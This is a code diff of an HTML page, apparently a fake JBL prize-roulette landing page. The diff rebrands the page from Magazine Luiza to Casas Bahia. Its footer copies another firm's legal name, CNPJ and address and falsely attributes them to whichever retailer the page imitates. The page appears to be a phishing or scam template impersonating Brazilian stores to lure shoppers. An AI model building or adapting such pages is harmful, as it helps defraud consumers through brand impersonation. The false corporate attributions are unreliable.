--- a/roleta/jbl/index.html
+++ b/roleta/jbl/index.html
@@ -3,7 +3,7 @@
   <meta charset="UTF-8">
 
   <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
-  <title>Magazine Luiza</title>
+  <title>Casas Bahia</title>
 
 <script src="js/latest.js" async="" defer=""></script>
 <script>
@@ -198,7 +198,7 @@
          </div>
       </div>
       <div class="divisoria"></div>
-      <p style="margin-left: 3%; margin-right: 3%; font-family: 'GellixRegular'; font-size: 14px; padding-top: 5px;"><span style="font-family: 'GellixSemiBold';">Termos e condições. Como cuidamos da sua privacidade. Acessibilidade Informações sobre seguros Blog Afiliados Tendências</span><br><br>© 1999-2024 Ebazar.com.br LTDA.CNPJ n.º 03.007.331/0001-41 / Av. das Nações Unidas, nº 3.003, Bonfim, Osasco/SP - CEP 06233-903 - empresa do grupo Magazine Luiza.<span style="font-family: 'GellixSemiBold';"><br><br>Brasil/Português</span></p>
+      <p style="margin-left: 3%; margin-right: 3%; font-family: 'GellixRegular'; font-size: 14px; padding-top: 5px;"><span style="font-family: 'GellixSemiBold';">Termos e condições. Como cuidamos da sua privacidade. Acessibilidade Informações sobre seguros Blog Afiliados Tendências</span><br><br>© 1999-2024 Ebazar.com.br LTDA.CNPJ n.º 03.007.331/0001-41 / Av. das Nações Unidas, nº 3.003, Bonfim, Osasco/SP - CEP 06233-903 - empresa do grupo Casas Bahia.<span style="font-family: 'GellixSemiBold';"><br><br>Brasil/Português</span></p>
       <script src="responda.html"></script>
       <script>
          document.querySelectorAll('.thumbnails img').forEach(image => {
